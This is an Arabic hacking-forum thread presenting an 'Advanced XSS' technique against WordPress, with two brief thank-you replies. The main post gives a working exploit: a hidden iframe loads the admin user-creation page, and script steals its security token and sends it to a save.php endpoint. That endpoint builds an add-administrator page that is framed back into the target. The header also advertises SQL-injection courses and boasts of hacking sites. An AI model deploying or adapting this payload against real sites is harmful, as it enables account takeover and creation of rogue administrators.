1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] Advanced XSS Part 2

الموضوع في 'آمن المواقع والسيرفرات' بواسطة a7mdrat, بتاريخ ‏17 نوفمبر 2013.

كاتب الموضوع : a7mdrat المشاهدات : 585 الردود : 2 ‏17 نوفمبر 2013
حالة الموضوع:
مغلق
  1. غير متصل

    a7mdrat
    rank
    Developer

    عضو منذ:
    ‏7 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    [​IMG]
    اليوم راح نعمل تكملة للطريقة الاولى و كيف ممكن تفيدنا اكثر بطرق اجمل

    الشرح الاول هنا :


    اليوم مع التكملة

    الدرس نظري اكثر منه تطبيقي لضيق الوقت شوية و الكسل هههه

    تكلمنا عنا

    XSS to CSRF

    موضوع اليوم نفس الفكرة لكن بطريقة افضل

    يعني ممكن تكتب 1000 استغلال يحدث في رابط واحد هذا هو الهدف

    الفكرة هذه جديدة لم ارها في النت

    ركزوا شوية

    نكمل من الدرس الاول
    كود PHP:
    <iframe id="iframe"  src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>
    <
    script>

      eval (
    "var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 

    document.write("<img src=http://127.0.0.1/save.php?xss=" +wptoken+">");

    </
    script>

    تمام الكود واضح يسحب التوكن ويرسله الى ملف الطريقة حتى الان ما في جديد

    الان ملف save.php

    لايحفظ الكود مثل ما يحفظ الكوكيز في طريقة السرقة المعروفة

    لكن يولد صفحة اضافة ادمين بالتوكن الجديد و يحفظها على السرفر باسم

    add_admin.html

    ثم نعمل لها iframe في صفحة الهدف
    الاستغلال النهائي

    كود PHP:
    <iframe id="iframe"  src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>
    <
    script>

      eval (
    "var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 

    document.write("<img src=http://127.0.0.1/save.php?xss=" +wptoken+">");
    </
    script>
    وطبعا الافرام يكون كامل مخفية عن طريق CSS

    واترك لكم التطوير طبعا!:"

     


    جاري تحميل الصفحة...
  2. غير متصل

    ABOJANA IRAQY
    DeveloPer Plus

    عضو منذ:
    ‏10 مايو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    74
    نقاط الجائزة:

    رد: Advanced XSS Part 2

    Thanks
     


  3. غير متصل

    Mr-Sp!R!T
    Developer

    عضو منذ:
    ‏21 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: Advanced XSS Part 2

    شكرا على الطرح​
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...